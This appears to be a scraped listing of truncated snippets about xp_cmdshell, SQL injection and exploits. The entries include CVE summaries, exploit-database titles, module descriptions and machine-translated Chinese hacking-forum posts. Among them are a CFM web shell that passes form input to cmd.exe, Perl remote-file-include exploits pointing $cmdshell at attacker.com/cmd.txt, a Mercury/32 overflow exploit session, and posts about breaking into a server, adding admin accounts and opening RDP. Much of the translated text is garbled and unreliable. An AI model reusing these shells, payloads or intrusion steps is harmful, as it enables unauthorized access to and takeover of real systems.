CVE-2026-9551

A vulnerability was identified in Das Parking Management System 停车场管理系统 6.2.0. This affects the function xpcmdshell of the file ParkingRecord/ExportParkingRecords of the component API Endpoint. The manipulation of the argument Value leads to sql injection. It is possible to initiate the attack...

PT-2025-40400

Name of the Vulnerable Software and Affected Versions YOSHOP version 2.0 Description The software is susceptible to an unauthenticated SQL injection through the goodsIds parameter of the /api/goods/listByIds API endpoint. The getListByIds function improperly concatenates user-supplied input into ...

SSJI-to Node. js vulnerability audit of the series a-vulnerability warning-the black bar safety net

hello I was in control of the security laboratory of the Whispering Wind, the JavaScript in Node. js with the help of turned into a server-side scripting language, so since it is a service side scripting language, there may be some security issues. SSJIserver side JavaScript injection is a...

maluinfo <= 206.2.38 (bb_usage_stats.php) Remote File Include Exploit

No description provided by source. !/usr/bin/perl maluinfo 206.2.38 brazilian PHPBB Class: Remote File Include Vulnerability Patch: unavailable Date: 2006/10/12 Remote: Yes Type: high...

Symantec Endpoint Protection Manager /servlet/ConsoleServlet Remote Command Execution

This module exploits XXE and SQL injection flaws in Symantec Endpoint Protection Manager versions 11.0, 12.0 and 12.1. When supplying a specially crafted XML external entity XXE request an attacker can reach SQL injection affected components. As xpcmdshell is enabled in the included database...

Nmap NSE net: ms-sql-xp-cmdshell

This VT has been deprecated and is therefore no longer functional. SPDX-FileCopyrightText: 2011 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...

Without from play a modified Server remote port-vulnerability warning-the black bar safety net

Today's invasion of a US AION server, encountered some problems, write a article for everyone to see, hope you also Can learn to some knowledge. By marginalia + mention the right to succeed to get to the Server Permissions, and then the SQL command to add the USER ADMIN in the opening 3 3 8 9 The...

The use of CMDshell View 3 3 8 9-vulnerability warning-the black bar safety net

The use of CMDshell View 3 3 8 9 port VBS version of the method, many times we can only temporarily to obtain broiler Cmd permissions, many times the broiler 3 3 8 9 port has been changed, in this case, you may wish to Use this method to check, using the method, full copy, paste to cmd, return ca...

Hack SA under the purview of the idea of adaptation-vulnerability warning-the black bar safety net

Last time already got this station of the SHELL, but the back door has long been K, today inadvertently and got the injection. D detection soon came out gratifying information, the SA permissions, go to the NB inside can list the directory but not the execution, telnet each other 1 4 3 3 can not ...

Use a low-privileged Oracle database accounts give the OS access permissions-bug warning-the black bar safety net

Author:Mickey These days look at the article called"Penetration: from application down to OS Oracle"of the document,feel quite interesting,the document probably means that is,if the ORACLE service is using the administrator account to start,as long as you have a have resource and connect privileg...

Green open terminal simple method-vulnerability warning-the black bar safety net

The presentation today of this open terminal, green, environmental protection, no pollution Not required to upload any files on the terminal the method is suitable for win2k,xp,2 0 0 3. This article premise is already through some method to get to the other side of a SYSTEM the permissions of the...

cfm cmdshell use of attention-exploit warning-the black bar safety net

cfm-cmdshell 1. html 2. head 3. meta http-equiv="Content-Type" content="text/html; charset=gb2312" 4. titleCFM shell/title 5. /head 6. body 7. !--- os. run --- 8. cfif IsDefined"FORM. cmd" 9. cfoutputcmd/cfoutput 1 0. cfexecute name="C:\Winnt\System32\cmd.exe" 1 1. arguments="/c cmd" 1 2...

Mercury/32 4.52 IMAPD - &#039;SEARCH&#039; (Authenticated) Overflow

Z:\ExpmercurySEARCH.pl 127.0.0.1 143 void ph4nt0m.org Mercury/32 v4.52 IMAPD SEARCH command Post-Auth Stack Overflow Exploit Found & Code by void ph4nt0m.org S: OK mercury.ph4nt0m.org IMAP4rev1 Mercury/32 v4.52 server ready. C: pst06 LOGIN void ph4nt0m.org S: pst06 OK LOGIN completed. C: pst06...

mercurycrammd5-overflow.txt

/ Mercury/32 4.51 SMTPD CRAM-MD5 Pre-Auth Remote Stack OverflowUniversal Public Version 1.0 http://www.ph4nt0m.org 2007-08-22 Code by: Zhenhan.Liu Original POC: http://www.milw0rm.com/exploits/4294 Vuln Analysis: http://pstgroup.blogspot.com/2007/08/tipsmercury-smtpd-auth-cram-md5-pre.html Our...

Mercury/32 4.51 SMTPD CRAM-MD5 Pre-Auth Remote Overflow Exploit

No description provided by source. / Mercury/32 4.51 SMTPD CRAM-MD5 Pre-Auth Remote Stack OverflowUniversal Public Version 1.0 http://www.ph4nt0m.org 2007-08-22 Code by: Zhenhan.Liu Original POC: http://www.milw0rm.com/exploits/4294 Vuln Analysis:...

Mercury32 Mail SMTPD 4.51 - SMTPD CRAM-MD5 Remote Overflow

Mercury32 Mail SMTPD 4.51 - SMTPD CRAM-MD5 Remote Overflow / Mercury/32 4.51 SMTPD CRAM-MD5 Pre-Auth Remote Stack OverflowUniversal Public Version 1.0 http://www.ph4nt0m.org 2007-08-22 Code by: Zhenhan.Liu Original POC: http://www.milw0rm.com/exploits/4294 Vuln Analysis:...

phpbblat2cyr-rfi.txt

!/usr/bin/perl phpBB lat2cyr 1.0.1 Class: Remote File Include Vulnerability Patch: unavailable Date: 2006/10/12 Remote: Yes Type: high Site: http://www.phpbbhacks.com/download/4808 use IO::Socket; use LWP::Simple; $cmdshell="http://attacker.com/cmd.txt"; ";$cmd = ; while$cmd ! "END" $socket =...

phpBB Amazonia Mod (zufallscodepart.php) Remote File Include Exploit

No description provided by source. !/usr/bin/perl AMAZONIA MOD for phpbb forums Class: Remote File Include Vulnerability Patch: unavailable Date: 2006/10/12 Remote: Yes Type: high...

phpBB SpamOborona Mod 1.0b - Remote File Inclusion

!/usr/bin/perl SpamOborona PHPBB Plugin Class: Remote File Include Vulnerability Patch: unavailable Date: 2006/10/12 Remote: Yes Type: high Site: http://spamoborona.net/down...

phpBB SpamBlocker Mod 1.0.2 - Remote File Inclusion

!/usr/bin/perl SpamBlockerMod package for phpBB Class: Remote File Include Vulnerability Patch: unavailable Date: 2006/10/12 Remote: Yes Type: high Site: http://leo.vak.ru/devel/spamblocker/spamblockermodv1.0.2.zip use IO::Socket; use LWP::Simple; $cmdshell="http://attacker.com/cmd.txt";...